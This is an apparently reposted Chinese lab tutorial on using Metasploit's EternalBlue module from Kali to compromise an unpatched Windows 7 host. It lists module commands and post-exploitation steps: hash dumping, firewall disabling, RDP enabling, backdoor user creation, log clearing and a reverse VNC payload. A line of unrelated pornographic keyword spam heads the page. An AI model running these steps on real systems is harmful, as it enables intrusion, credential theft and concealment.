日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

發布時間:2023/12/2 编程问答 45 豆豆
生活随笔 收集整理的這篇文章主要介紹了 kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

kail利用msf工具對ms17-010(永恒之藍)漏洞入侵滲透Win7

前言:

提到操作系統漏洞,大家肯定聽說過耳熟能詳的永恒之藍(MS17-010)了,他的爆發源于WannaCry勒索病毒的誕生。
該病毒是不法分子利用NSA(National Security Agency,美國國家安全局)泄露的危險漏洞“EternalBlue”(永恒之藍)進行傳播 。勒索病毒肆虐,儼然是一場全球性互聯網災難,給廣大電腦用戶造成了巨大損失。最新統計數據顯示,100多個國家和地區超過10萬臺電腦遭到了勒索病毒攻擊、感染。 勒索病毒是自熊貓燒香以來影響力最大的病毒之一。

實驗環境:

工具:metasploit

靶機兩臺:windows 7sp1和kali2020

攻擊機IP地址:192.168.29.131

被攻擊機IP地址:192.168.29.128

實驗條件:兩臺機子可以互通的,并且windows 7sp1(無補丁)開啟了445端口,防火墻是關閉的。
?

步驟:

1、在kali里面打開metasploit漏洞利用框架

2、搜索ms17-010漏洞利用模塊 search 17-010

找到exploit/windows/smb/ms17_010_eternalblue

其中exploit具有攻擊性,auxliary是用來驗證的。

3、使用利用模塊use+exploit/windows/smb/ms17_010_eternalblue

4、查看配置項 show options

5、設置 靶機IP地址(RHOST),攻擊機IP地址(LHOST)

再次查看配置項

6、實施攻擊exploit/run

7、攻入目標主機

Meterpreter 是 Metasploit 的一個擴展模塊,可以調用 Metasploit 的一些功能,
對目標系統進行更深入的滲透,如獲取屏幕、上傳/下載文件、創建持久后門等。

?

在攻擊進去的情況下演示幾個功能

1、查看目標主機的操作系統信息(sysinfo)

2、對目標主機的屏幕進行截圖(截圖保存在/root下)

3、查看目標主機所有的用戶名和密碼(密碼顯示為hash值)

4獲取shell頁面

亂碼解決方法:

輸入chcp 65001可將亂碼解決

5、關閉防火墻

6、關閉Telnet服務

7、用兩種方法開啟遠程桌面服務,并查看遠程桌面功能啟用情況

1)方法1:run??getgui ?-e

(2)方法2:run?post/windows/manage/enable_rdp

到windows7sp1上查看遠程桌面功能啟用情況

8、創建系統用戶(創建用戶名為:test,密碼為:123456)

9、清除日志

?

使用VNC payload遠程操控目標電腦

1,輸入Background,返回退出meterpreter界面

2,查看set payload 參數(輸入set payload 按兩下 TAB鍵 )

找到windows/x64/vncinject/reverse_tcp,復制黏貼

3,set payload windows/x64/vncinject/reverse_tcp

4,set viewonly no

5,exploit

成功獲取控制權

?

?

總結

以上是生活随笔為你收集整理的kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。